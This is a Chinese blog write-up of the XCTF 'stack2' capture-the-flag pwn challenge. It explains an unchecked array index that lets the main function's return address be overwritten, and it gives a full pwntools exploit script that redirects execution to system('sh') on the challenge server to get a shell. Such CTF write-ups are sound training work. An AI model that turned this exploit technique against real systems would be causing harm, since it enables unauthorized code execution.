XCTF stack2 [Writeup]

最新推荐文章于 2024-06-21 12:52:40 发布
最新推荐文章于 2024-06-21 12:52:40 发布
阅读量129 收藏
点赞数
分类专栏: pwn 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43483799/article/details/128834860
版权

题源

https://adworld.xctf.org.cn/challenges/details?hash=4bb2f552-6679-4d25-a18d-883e4d9c206b_2

题解

TL;DR

32bit程序劫持main函数返回地址,构造system函数,准备sh参数

照例先checksec看一下情况

在这里插入图片描述

32位程序,没有开PIE,所以程序代码段都是用静态地址

照例IDA看一下main函数

在这里插入图片描述

如上图所示,非常明显地,在往v13这个局部数组变量里写一个字符时没有检查是否越界。根据栈上数组和函数返回地址的相对关系,用gdb可以调试出来当修改第0x84个字节的时候,返回地址的最低1byte会被修改掉。利用这一点可以修改main函数的返回地址,每次修改1个字节。

用IDA发现程序给了一个hackhere函数在0x804859B,所以可以修改main跳转到这里。

在这里插入图片描述

不过在ssh执行时发现目标只有sh,没有/bin/bash,所以hackhere不可用,如下图。

在这里插入图片描述

那么需要自己构造新的后门函数,比如system("sh")system地址可以从plt表拿到,sh字符串可以用ROPgadget搜到。相比于跳转到hackhere函数,多了一个步骤是需要在栈上准备好sh字符串的地址。

在这里插入图片描述

最后运行脚本拿到flag。

在这里插入图片描述

完整代码

from pwn import *

io = remote('61.147.171.105',64929)
# io = process('./stack2')
prox = ELF('./stack2')

system_plt = prox.plt['system']
sh_address = 0x08048987
ret_offset = 0x70+0x10+0x4
io.sendlineafter(b'have:',b'0')

def send_4bytes(offset,number):
    def send_num(ind,num):
        io.sendlineafter(b'exit',b'3')
        io.sendlineafter(b'change:',ind)
        io.sendlineafter(b'number:',num)
    for i in range(4):
        send_num(str(offset+i).encode(),str((number>>(i*8))&0xff).encode())

send_4bytes(ret_offset,system_plt)
send_4bytes(ret_offset+0x8,sh_address)

io.sendlineafter(b'exit',b'5')

io.interactive()

总结

  • 在IDA看v13数组与ebp偏移时其实是0x70+0x4字节,但执行时gdb发现程序又用ecx修改了esp的值,实际是0x84的偏移。不确定这个是什么原因?
  • system("sh")也可以进shell,不一定非得"/bin/bash"
  • 假的getshell函数挺唬人的,一不小心容易被弄乱思路
  • 回顾一下知识点,放sh_address时候需要设置0x8的偏移是用来放ebp和return address,然后才轮到arg1
c01dkit
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
stack2(xctf)
weixin_43868725的博客
05-26 708
0x0 程序保护和流程 保护: 流程: 当选择change number时没有对数组边界进行检查所以可以任意地址写。又在函数列表中发现一个hackhere() 0x1 利用过程 我们只需要通过数组写入这个函数的地址到main函数的返回地址处即可。简单计算一下。 v13这个数组首地址距离返回地址0x70+0x4,发现不行。然后用ida远程调试一下。输入了五个数字分别是1,2,3,4,5。offset=0xFFBDC56C-0xFFBDC4E8=0x84。 远程发现没有bash。 换成system(
[XCTF]stack2(你的疑问可以在这里找到答案)
qq_62539372的博客
07-10 237
前面的必要流程就不多说啦 这道题开了栈溢出保护 运行一下似乎找不到可以利用的点 那就看看这里吧 v13这个数组 在第三个选项change的时候没有限制 so 我们可以在main函数结束的时候改变返回地址 hackhere函数里有个system('/bin/bash')不同于system('/bin/sh')打通之后会出现没有bash所以我们不能直接利用hackhere这个函数的地址当作main函数的返回地址!我们可以把plt表的system函数的地址当作返回地址,传参'sh'思路有啦 我们接下来就要考虑在哪
XCTF-pwn-stack2 - Writeup
菜小狗.的博客
11-28 536
偶尔在学习的阶段慢慢发现的进步 抽空写点笔记记录一下子 这次做的题目还是栈溢出漏洞的题目但是并没用用到payload,简单用了下ROP 题目描述 除了一个名称 stack2 题目描述是:暂无 下载附件运行一下看看流程 保护开启了nx 和canary 流程大概是提供了4个选项的功能:加数、改数还有求平均数啥的。 然后丢到iad里看一下这部分的流程简单分析一下漏洞点。 在这里看还是蛮正常的,...
xctf-pwn-“stack2 & pwn1 & welpwn”
njh18790816639的博客
07-30 181
stack2 首先探测一番,是32位,看下保护! ida静态分析一番! 还有个后门函数: 原先先要使用这个后门函数,但是发现远程服务器是没有bash的,所以这个后门函数是没有用的,误导我等! 不过还是先按正常思路来说,这第三个函数是没有检查数据的合法性的。 ...
ADworld pwn wp - stack2
fa1c4的blog
06-25 181
int __cdecl main(int argc, const char **argv, const char **envp) { int v3; // eax unsigned int v5; // [esp+18h] [ebp-90h] BYREF unsigned int v6; // [esp+1Ch] [ebp-8Ch] BYREF int v7; // [esp+20h] [ebp-88h] BYREF unsigned int j; // [esp+24h] [ebp..
XCTF-mobile app2
01-03
app2-安卓逆向1.提取文件2.分析文件3.分析XML文件4.经过验证得到flag5.其他解法 下载地址:点此下载 1.提取文件 更改app安装包后缀为zip 把这3个文件解压出来 然后使用dex2jar将dex文件转换为jar文件,得到一个jar...
writeup:xctf撰写
03-28
写上去xctf撰写
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
圣徒xctf网站
02-14
圣徒xctf网站概述SaintsXCTF Web应用程序的前端。 这是SaintsXCTF Web应用程序的第二个版本。 前端使用React.js编写,并使用Sass进行样式设置。 API调用通过Nginx代理路由到 。指令在本地启动应用程序首次设置应该...
PWN学习-ADworld刷题
WocW的博客
06-04 1579
前言 搁置了一段时间没更博,经历了考试还有一些其他事,决心好好去学pwn。学习的方法打算是按照看视频课加刷题加查找资料来学习。 先把新手题都刷了一遍,都是很入门的题目,没啥好提的,收获也少。然后去刷进阶的题,但是目前还没有遇到堆的题目,视频课已经快学完了,学习资料是看的B站上的这个,觉得讲的很好,YOTUBE上也有 讲一下刷进阶题时个人遇到的一些坑…或者是学到的东西 分析 pwn-100 检查...
Exploit练习Protostar——stack2
weixin_34315485的博客
04-30 117
简介   这次练习通过环境变量设置buffer的值,所以我们需要在exploit中设置一个大于64字节的环境变量。 源码 1 #include <stdlib.h> 2 #include <unistd.h> 3 #include <stdio.h> 4 #include <string.h> 5 6 int ...
XCTF 4th-QCTF-2018 pwn stack2 writeup
qq_39596232的博客
08-30 848
题目描述: 暂无 分析思路: 1、首先拿到ELF文件,我们首先查看一下详细信息: tucker@ubuntu:~/pwn$ file stack2 stack2: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-, for GNU/Linux...
xctf攻防世界_echo——爬坑之路(ret2dlresolve)
勤劳的小蜜蜂
05-27 937
很容易看到是栈溢出漏洞,而且给出了一个sample()的函数来读取flag,直接覆盖返回地址,在本地调试很快就弄完了。但是没想到,跟服务器连接后,死活出不来。没办法,想到上一篇文章一样的坑,看来只能拿Shell才行了。 查找了很多资料,一开始想着用write()函数泄漏,结果没这个函数。还动过使用fprintf函数的想法,但是远程太坑了。留几个学习到的点: 1、 gbd中可以使...
pwn CTF 4th-QCTF-2018 stack2
qq_41071646的博客
01-23 3409
先把程序跑一遍看看·~~~~~~~ 然后我们好像可以 加数还有 改变数   4功能好像还是 求平均数的 ~~~~ 看来功能还是很齐全的吗~~~~  然后我们 咦 这里的平均数为啥是  2.00呢 ~!~~~~  带着疑问去 看ida 这里好像没有什么毛病  限制了 输入的数量是99 然后往下看   这里就是bug了    因为我们没有检查v13数组的边界 这里我们可...
2019.7.26 攻防世界Stack2 以及gdb 和IDA算偏移
DSR446的博客
08-19 2454
我们很明显这里有一个数组越界的漏洞我们可以利用。 [这个博客写的很详细]https://blog.csdn.net/qq_41071646/article/details/86600053 下面我就只介绍一下怎么算的偏移。 ...
stack2 [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列15
重新启程
12-23 1312
题目地址:stack2 这是高手进阶区的第四题了,速度挺快啊,朋友!加油! 废话不说,看看题目先 没有什么特别的内容,那就看看保护机制 root@mypwn:/ctf/work/python/stack2# checksec fcca8ceb507544d1bd9c4a7925907a1d [*] '/ctf/work/python/stack2/fcca8ceb507544d1b...
xctf pwn高手进阶题之stack2
neuisf的博客
01-25 305
程序读取一个数字n,然后根据数字n读取数字到缓冲区,在执行需修改操作时为判断是否越界,而是根据用户输入的数字进行修改,造成堆栈地址内容修改。只需修改返回值即可。此题提供了hackhere函数输出flag,本地执行正常,远程出错,提示找不到/bin/bash。此处,技巧是执行system(’sh’)代替system(’/bin/sh’)。 exp: from pwn import * p=remot...
Windows系统上更换pip源的详细指南
最新发布
2402_85758349的博客
06-21 633
Python的包管理工具pip允许用户从Python包索引(PyPI)下载和安装第三方库。然而,默认的PyPI源有时可能因为网络问题或地理位置导致访问速度较慢。更换为更快的源可以显著提高下载和安装Python包的速度。本文将详细介绍如何在Windows系统上更换pip的源。
生命在于学习——Python人工智能原理(4.1)
易水哲的博客
06-19 2013
前言:人工智能基础结束了,本章开启Python的学习,之前我写过Python的学习了,不过是偏向网络安全方向的学习,这次算是完完全全的学习。
xctf supersqli
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛题目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

c01dkit

好可怜一博主,都没人打赏>_<

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值